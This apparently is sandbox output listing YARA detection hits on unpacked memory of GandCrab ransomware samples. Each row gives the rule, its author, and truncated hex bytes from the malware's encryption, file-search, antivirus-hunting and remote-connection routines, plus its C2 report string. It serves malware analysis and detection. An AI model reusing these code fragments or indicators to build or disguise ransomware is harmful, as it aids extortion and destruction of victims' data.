3.3.mqsmvj.exe.3790000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
3.3.mqsmvj.exe.3790000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
3.3.mqsmvj.exe.3790000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
3.3.mqsmvj.exe.3790000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
3.3.mqsmvj.exe.3790000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
22.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
22.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
22.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
22.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
22.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
22.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
0.0.IJr8RvvhZ3.exe.f140000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0.0.IJr8RvvhZ3.exe.f140000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0.0.IJr8RvvhZ3.exe.f140000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.0.IJr8RvvhZ3.exe.f140000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0.0.IJr8RvvhZ3.exe.f140000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.0.IJr8RvvhZ3.exe.f140000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 14 0F 8B 35 44 A1 14 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 14 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 14 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 14 0F 8B 35 10 A1 14 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 14 0F C7 44 24 1C 64 F4 14 0F C7 44 24 20 80 F4 14 0F C7 44 24 24 A0 F4 14 0F C7 44 24 28 BC F4 14 0F C7 44 24 2C D8 F4 14 0F C7 44 24 30 F0 F4 14 0F C7 44 24 34 04 F5 14 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 14 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 15 0F C7 45 B8 BC 03 15 0F C7 45 BC ...
34.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
34.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
34.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
34.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
34.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
34.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
3.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
3.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
3.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
3.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
3.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
3.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
11.3.mqsmvj.exe.3290000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
11.3.mqsmvj.exe.3290000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
11.3.mqsmvj.exe.3290000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
11.3.mqsmvj.exe.3290000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
11.3.mqsmvj.exe.3290000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
11.3.mqsmvj.exe.3290000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
25.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
25.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
25.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
25.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
25.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
36.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
36.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
36.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
36.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
36.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
36.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
27.3.mqsmvj.exe.3490000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
27.3.mqsmvj.exe.3490000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
27.3.mqsmvj.exe.3490000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
27.3.mqsmvj.exe.3490000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
27.3.mqsmvj.exe.3490000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
27.3.mqsmvj.exe.3490000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
16.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
16.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
16.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
16.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
16.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
28.3.mqsmvj.exe.3130000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
28.3.mqsmvj.exe.3130000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
28.3.mqsmvj.exe.3130000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
28.3.mqsmvj.exe.3130000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
28.3.mqsmvj.exe.3130000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
28.3.mqsmvj.exe.3130000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
16.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
16.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 